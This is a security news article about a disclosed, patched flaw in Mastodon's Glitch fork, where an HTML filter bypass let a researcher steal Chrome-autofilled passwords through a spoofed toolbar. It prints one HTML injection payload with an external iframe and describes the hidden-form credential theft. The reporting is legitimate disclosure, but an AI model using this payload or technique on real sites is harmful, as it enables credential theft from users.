EN
EN DE
EN
EN DE
Contact Us
Sign Up
Topics
Finance & insurance
Trade
Industry
IT & Consulting
Tourism
Transport
Law
Public

Mastodon users vulnerable to password-stealing attacks

0
Share:

Attackers could steal password credentials from Mastodon users due to a vulnerability in Glitch, a fork of Mastodon, a researcher has warned.

Mastodon has risen in popularity in recent weeks, as many users moved to the social media platform as a replacement for Twitter, recently acquired by controversial businessman Elon Musk.

“Everybody on infosec Twitter seemed to be jumping ship to the infosec.exchange Mastodon server, so I decided to see what the fuss was all about,” Gareth Heyes, of PortSwigger Research*, wrote in a blog post released today.

Heyes found he was able to steal users’ stored credentials using Chrome’s autofill feature by tricking them into clicking a malicious element he had disguised as a toolbar.

After discovering that Mastodon allows users to post HTML, Heyes found out from other users that he was able to spoof a blue ‘official’ tick in his username by inputting :verified:.

He placed the :verified: string inside an anchor text node that was inside the title attribute by doing the following:

 

Input: <abbr title=”<a href=’https://blah’>:verified:</a>><iframe src=//garethheyes.co.uk/>”>

Output: <abbr title=”<a href=’https://blah’><img draggable=” false” … >><iframe src=//garethheyes.co.uk/>

 

This allowed Heyes to successfully bypass the HTML filter due to the replacement of the verified placeholder with an image that contained double quotes.

“The filter was completely destroyed as I could just inject arbitrary HTML, but one last thing stood in my way: they used a relatively strict Content Security Policy (CSP),” wrote Heyes.

“Pretty much each resource was limited to infosec.exchange, with the exception of iframes which allowed any HTTPS URL.”

Spoofed

Heyes then realised he could inject form elements, allowing him to spoof a password form which, when combined with Chrome autofill, would allow an attacker access to the credentials.

Worse still, the researcher was able to spoof the toolbar below. Where a user clicked on any elements of the spoofed toolbar, it would send their credentials to an attacker’s server.

Heyes tested Chrome to see if it would still autofill the credentials when the inputs were invisible. If an attacker used an opacity value of zero, Chrome would still conveniently fill in the credentials.

Due to the CSP, Heyes couldn’t use inline styles. However, looking at the CSS files, he found a class that had opacity:0 “in a couple of seconds”, which “worked perfectly”.

He explained to The Daily Swig: “Add the PoC code into post text area and hit publish – [the] user sees [the] post and clicks on what they think is a Mastodon toolbar. Credentials are [then] sent to an external server.

“In a real attack the credentials will be stored and the user redirected back to the site.”

Mitigations

Any Mastodon instance using the Gitch fork of Mastodon is vulnerable, Heyes explained, adding that since the server is vulnerable, “there’s not much a user can do to protect themselves”.

He added: “However, it would be a good idea to only autofill your password with user interaction to prevent credentials from being stolen.”

Heyes reported the bug directly to Glitch. Contributors have released a patch for the issue, which is available on the Glitch repo.

 

* PortSwigger Research is the research arm of PortSwigger Ltd, the parent company of The Daily Swig.

https://portswigger.net/daily-swig/mastodon-users-vulnerable-to-password-stealing-attacks

Leave a Comment

Your email address will not be published. Required fields are marked *

loader-image
London, GB
11:21 pm, Jul 9, 2025
weather icon 22°C
L: 20° | H: 22°
overcast clouds
Humidity: 62 %
Pressure: 1022 mb
Wind: 3 mph W
Wind Gust: 3 mph
UV Index: 0
Precipitation: 0 mm
Clouds: 100%
Rain Chance: 0%
Visibility: 10 km
Sunrise: 4:54 am
Sunset: 9:16 pm
DailyHourly
Daily ForecastHourly Forecast
Tomorrow 10:00 pm
weather icon
20° | 22°°C 0 mm 0% 7 mph 70 % 1023 mb 0 mm/h
Fri Jul 11 10:00 pm
weather icon
20° | 31°°C 0 mm 0% 9 mph 64 % 1021 mb 0 mm/h
Sat Jul 12 10:00 pm
weather icon
18° | 29°°C 0 mm 0% 10 mph 72 % 1019 mb 0 mm/h
Sun Jul 13 10:00 pm
weather icon
17° | 29°°C 0 mm 0% 8 mph 58 % 1016 mb 0 mm/h
Mon Jul 14 10:00 pm
weather icon
19° | 30°°C 0 mm 0% 10 mph 83 % 1014 mb 0 mm/h
Tomorrow 1:00 am
weather icon
19° | 21°°C 0 mm 0% 1 mph 63 % 1022 mb 0 mm/h
Tomorrow 4:00 am
weather icon
17° | 19°°C 0 mm 0% 3 mph 68 % 1022 mb 0 mm/h
Tomorrow 7:00 am
weather icon
19° | 19°°C 0 mm 0% 3 mph 70 % 1023 mb 0 mm/h
Tomorrow 10:00 am
weather icon
25° | 25°°C 0 mm 0% 4 mph 52 % 1023 mb 0 mm/h
Tomorrow 1:00 pm
weather icon
28° | 28°°C 0 mm 0% 4 mph 38 % 1022 mb 0 mm/h
Tomorrow 4:00 pm
weather icon
30° | 30°°C 0 mm 0% 5 mph 32 % 1021 mb 0 mm/h
Tomorrow 7:00 pm
weather icon
29° | 29°°C 0 mm 0% 7 mph 33 % 1020 mb 0 mm/h
Tomorrow 10:00 pm
weather icon
23° | 23°°C 0 mm 0% 6 mph 55 % 1022 mb 0 mm/h
Weather from OpenWeatherMap
Name Price24H (%)
Bitcoin(BTC)
€95,064.76
2.11%
Ethereum(ETH)
€2,367.57
6.26%
Tether(USDT)
€0.86
0.01%
XRP(XRP)
€2.06
4.67%
Solana(SOL)
€134.52
4.33%
USDC(USDC)
€0.86
0.01%
Dogecoin(DOGE)
€0.155343
6.40%
Shiba Inu(SHIB)
€0.000010
5.36%
Pepe(PEPE)
€0.000009
10.41%
Risikomonitor
Know and monitor IT vulnerabilities with just one click before it is too late.

Utility link

Useful link

Newsletter

Follow Us

Facebook Twitter Youtube Linkedin

© 2025 risikomonitor.com gmbh

Scroll to Top